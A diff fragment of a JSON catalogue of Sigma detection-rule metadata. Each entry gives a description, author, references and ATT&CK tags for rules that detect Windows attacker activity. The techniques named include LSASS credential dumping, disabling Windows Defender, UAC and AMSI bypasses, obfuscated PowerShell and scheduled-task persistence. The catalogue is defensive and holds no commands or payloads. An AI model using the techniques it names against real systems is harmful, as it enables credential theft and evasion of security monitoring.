+ "attack.exfiltration",
+ "attack.t1567"
+ ]
+ },
+ "uuid": "1f0f6176-6482-4027-b151-00071af39d7e",
+ "value": "Suspicious ConfigSecurityPolicy Execution"
+ },
+ {
+ "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/02/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/_xpn_/status/1491557187168178176",
+ "https://www.youtube.com/watch?v=Ie831jF0bb0",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011",
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6",
+ "value": "Process Access via TrolleyExpress Exclusion"
+ },
+ {
+ "description": "Detects attackers attempting to disable Windows Defender using Powershell",
+ "meta": {
+ "author": "ok @securonix invrep-de, oscd.community, frack113",
+ "creation_date": "2020/10/12",
+ "falsepositive": [
+ "Minimal, for some older versions of dev tools, such as pycharm, developers were known to 
sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + ], + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring" + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe" + }, + { + "description": "Detects the use of NPS a port forwarding tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_nps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + 
"https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper" + }, + { + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_amsi_null_bits_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_amsi_null_bits_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "92a974db-ab84-457f-9ec0-55db83d7a825", + "value": "Potential AMSI Bypass Using NULL Bits - ProcessCreation" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"056a7ee1-4853-4e67-86a0-3fd9ceed7555", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER" + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/02/15", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline" + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_discover_private_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys" + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "level": 
"medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL" + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ] + }, + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020" + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies" }, { "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", 
@@ -53308,1068 +43172,443 @@ "value": "Suspicious Rundll32 Activity Invoking Sys File" }, { - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "meta": { "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" - ], - "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "value": "Suspicious Workstation Locking via Rundll32" - }, - { - "description": "This rule detects the execution of Run Once task as configured in the registry", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", + "creation_date": "2021/07/27", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_runonce_execution.yml", + "filename": "proc_creation_win_clip.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1115" ] }, - "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", - "value": "Run Once Task Execution as Configured in Registry" + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP" }, { - "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", + "author": "frack113", + "creation_date": "2021/07/13", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_runscripthelper.yml", + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "File Download Using ProtocolHandler.exe" + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + 
"creation_date": "2022/08/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_local_admin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add User to Local Administrators" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.001" ] }, - "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "value": "Suspicious Runscripthelper.exe" + "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "value": "Usage Of Web Request Commands And Cmdlets" }, { - "description": "Detects suspicious process run from unusual locations", + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of 
dump file exfiltration", "meta": { - "author": "juju4, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2022/01/04", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "filename": "proc_creation_win_susp_run_locations.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-05-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" - ] - }, - "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "value": "Suspicious Process Start Locations" - }, - { - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_rurat_exec_location.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", - "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" - }, - { - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after 
creation to include their malicious payload\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_change.yml", + "filename": "proc_creation_win_susp_winrar_dmp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" ], "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ] }, - "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "value": "Suspicious Modification Of Scheduled Tasks" + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files" }, { - "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", + "author": "Florian Roth", + "creation_date": "2019/09/30", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_susp_schtasks_delete.yml", + "filename": "proc_creation_win_malware_emotet.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" - ], - "tags": [ - 
"attack.impact", - "attack.t1489" - ] - }, - "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "value": "Delete Important Scheduled Task" - }, - { - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_schtasks_delete_all.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "value": "Delete All Scheduled Tasks" - }, - { - "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_disable.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" - ], - "tags": [ - "attack.impact", - 
"attack.t1489" - ] - }, - "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "value": "Disable Important Scheduled Task" - }, - { - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/21", - "falsepositive": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" - ], - "filename": "proc_creation_win_susp_schtasks_env_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ] }, - "uuid": "81325ce1-be01-4250-944f-b4789644556f", - "value": "Suspicious Schtasks From Env Var Folder" + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation" }, { - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", "meta": { - "author": "Florian 
Roth", - "creation_date": "2022/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "value": "Schtasks From Suspicious Folders" - }, - { - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "filename": "proc_creation_win_susp_schtasks_parent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "9494479d-d994-40bf-a8b1-eea890237021", - "value": "Suspicious Add Scheduled Task Parent" - }, - { - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "filename": "proc_creation_win_susp_schtasks_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", - "value": "Suspicious Add Scheduled Command Pattern" - }, - { - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Legitmate processes that run at logon. Filter according to your environment" - ], - "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", - "value": "Suspicious Schtasks Schedule Types" - }, - { - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", - "falsepositive": [ - "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" - ], - "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", - "value": "Suspicious Schtasks Schedule Type With High Privileges" - }, - { - "description": "schtasks.exe create task from user AppData\\Local\\Temp", - "meta": { - "author": "frack113", - "creation_date": "2021/11/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_schtasks_user_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", - "value": "Suspicious Add Scheduled Task From User AppData Temp" - }, - { - "description": "Detects the creation of scheduled tasks in user session", - "meta": { - "author": "Florian Roth", + "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", "creation_date": "2019/01/16", "falsepositive": [ - "Administrative activity", - "Software installation" + "Inventory tool runs", + "Administrative activity" ], - "filename": "proc_creation_win_susp_schtask_creation.yml", - "level": "low", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" - ] - }, - "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", - "value": "Scheduled Task Creation" - }, - { - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/11", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "value": "Suspicious Scheduled Task Creation Involving Temp Folder" - }, - { - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/11", - "falsepositive": [ - "Legitimate use by administrative staff" - ], - "filename": "proc_creation_win_susp_screenconnect_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", - 
